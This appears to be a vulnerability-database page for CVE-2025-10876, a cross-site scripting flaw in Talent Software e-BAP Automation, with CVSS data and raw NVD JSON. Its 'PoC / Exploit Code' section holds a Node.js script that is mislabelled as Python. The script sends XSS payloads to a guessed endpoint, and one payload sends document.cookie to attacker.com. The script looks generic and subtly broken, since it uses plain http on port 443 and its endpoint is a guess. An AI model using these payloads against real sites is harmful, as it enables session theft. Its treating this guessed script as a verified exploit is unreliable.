Security Vulnerability Report
中文
CVE-2025-10876 CVSS 5.3 MEDIUM

CVE-2025-10876

Published: 2025-12-09 16:17:33
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Talent Software e-BAP Automation allows Cross-Site Scripting (XSS).This issue affects e-BAP Automation: from 1.8.96 before v.41815.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

e-BAP Automation < 1.8.96
e-BAP Automation >= 1.8.96 and < v.41815

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-10876 XSS PoC for Talent Software e-BAP Automation // Target: e-BAP Automation versions before v.41815 // Payload: Stored XSS via unsanitized input field const http = require('http'); // Configuration const targetHost = 'target-server.com'; const targetPort = 443; const targetPath = '/e-bap/api/submit'; // Typical API endpoint // Malicious XSS payloads const payloads = [ '<script>alert(document.cookie)</script>', '<img src=x onerror=fetch("https://attacker.com/steal?c="+document.cookie)>', '<svg onload=eval(atob("YWxlcnQoJ1hTUyBFeHBsb2l0ZWQnKQ=="))>', '<iframe src="javascript:alert(document.domain)">' ]; function sendExploit(payload) { const postData = JSON.stringify({ 'field_name': payload, // Unsanitized input field 'form_id': 'user_input_form', 'submit': 'Save' }); const options = { hostname: targetHost, port: targetPort, path: targetPath, method: 'POST', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(postData), 'User-Agent': 'Mozilla/5.0 (XSS-Test)' } }; const req = http.request(options, (res) => { console.log(`Status: ${res.statusCode}`); console.log(`Payload sent: ${payload}`); }); req.write(postData); req.end(); } // Send each payload payloads.forEach((payload, index) => { setTimeout(() => sendExploit(payload), index * 1000); }); console.log('CVE-2025-10876 PoC - XSS Exploitation Script'); console.log('Target: Talent Software e-BAP Automation'); console.log('Vulnerability: Improper Input Neutralization (XSS)');

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10876", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:33.247", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Talent Software e-BAP Automation allows Cross-Site Scripting (XSS).This issue affects e-BAP Automation: from 1.8.96 before v.41815."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0434", "source": "[email protected]"}]}}